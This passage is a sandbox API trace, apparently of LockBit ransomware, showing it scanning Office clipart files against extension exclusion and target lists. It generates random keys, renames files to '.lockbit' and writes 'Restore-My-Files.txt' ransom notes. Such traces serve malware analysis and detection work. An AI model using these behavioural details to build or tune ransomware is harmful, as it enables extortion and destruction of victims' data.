lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.305] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.305] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197979.WMF.lockbit") returned 72 [0150.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197979.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0197979.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.306] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.307] malloc (_Size=0x40068) returned 0x3d70450 [0150.307] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=40230) returned 1 [0150.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0150.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0150.308] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0150.313] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197979.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197979.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.313] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.313] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.315] free (_Block=0x1fa2ed8) [0150.315] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197979.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.315] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.315] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.315] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23edc800, ftCreationTime.dwHighDateTime=0x1be3d01, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x23edc800, ftLastWriteTime.dwHighDateTime=0x1be3d01, nFileSizeHigh=0x0, nFileSizeLow=0x668c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0197983.WMF", cAlternateFileName="")) returned 1 [0150.315] lstrcmpiW (lpString1=".", lpString2="J0197983.WMF") returned -1 [0150.315] lstrcmpiW (lpString1="..", lpString2="J0197983.WMF") returned -1 [0150.315] PathFindExtensionW (pszPath="J0197983.WMF") returned=".WMF" [0150.315] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.315] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.315] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.315] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.315] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.315] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.316] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.317] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.317] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.318] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.318] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.318] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.318] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.318] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.318] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0197983.WMF") returned 1 [0150.318] lstrcmpiW (lpString1="ntldr", lpString2="J0197983.WMF") returned 1 [0150.318] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0197983.WMF") returned 1 [0150.318] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0197983.WMF") returned -1 [0150.318] lstrcmpiW (lpString1="autorun.inf", lpString2="J0197983.WMF") returned -1 [0150.318] lstrcmpiW (lpString1="thumbs.db", lpString2="J0197983.WMF") returned 1 [0150.318] lstrcmpiW (lpString1="iconcache.db", lpString2="J0197983.WMF") returned -1 [0150.318] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.318] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197983.WMF") returned=".WMF" [0150.318] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.318] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.318] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.318] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.319] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.320] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.320] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.320] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.320] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.320] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.320] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.320] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197983.WMF.lockbit") returned 72 [0150.320] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197983.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0197983.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.326] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.326] malloc (_Size=0x40068) returned 0x3df0008 [0150.326] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26252) returned 1 [0150.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.327] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.333] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197983.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197983.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.333] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.333] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.334] free (_Block=0x1fa2ed8) [0150.334] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197983.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.335] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.335] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.335] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9fe6800, ftCreationTime.dwHighDateTime=0x1c0323c, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9fe6800, ftLastWriteTime.dwHighDateTime=0x1c0323c, nFileSizeHigh=0x0, nFileSizeLow=0x849c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198016.WMF", cAlternateFileName="")) returned 1 [0150.335] lstrcmpiW (lpString1=".", lpString2="J0198016.WMF") returned -1 [0150.335] lstrcmpiW (lpString1="..", lpString2="J0198016.WMF") returned -1 [0150.335] PathFindExtensionW (pszPath="J0198016.WMF") returned=".WMF" [0150.335] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.335] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.336] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.336] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.337] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198016.WMF") returned 1 [0150.337] lstrcmpiW (lpString1="ntldr", lpString2="J0198016.WMF") returned 1 [0150.337] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198016.WMF") returned 1 [0150.337] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198016.WMF") returned -1 [0150.337] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198016.WMF") returned -1 [0150.337] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198016.WMF") returned 1 [0150.337] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198016.WMF") returned -1 [0150.337] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.338] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198016.WMF") returned=".WMF" [0150.338] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.338] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.338] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.339] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.339] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.339] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.339] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.339] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.339] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.339] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198016.WMF.lockbit") returned 72 [0150.339] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198016.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198016.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.340] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.340] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.340] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=33948) returned 1 [0150.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.341] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198016.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198016.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.346] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.346] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.348] free (_Block=0x1fa2ed8) [0150.348] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198016.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.348] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.348] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.348] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f94700, ftCreationTime.dwHighDateTime=0x1bd8464, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x71f94700, ftLastWriteTime.dwHighDateTime=0x1bd8464, nFileSizeHigh=0x0, nFileSizeLow=0x5cae, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198020.WMF", cAlternateFileName="")) returned 1 [0150.348] lstrcmpiW (lpString1=".", lpString2="J0198020.WMF") returned -1 [0150.348] lstrcmpiW (lpString1="..", lpString2="J0198020.WMF") returned -1 [0150.348] PathFindExtensionW (pszPath="J0198020.WMF") returned=".WMF" [0150.348] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.348] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.348] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.348] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.348] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.348] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.348] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.348] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.349] 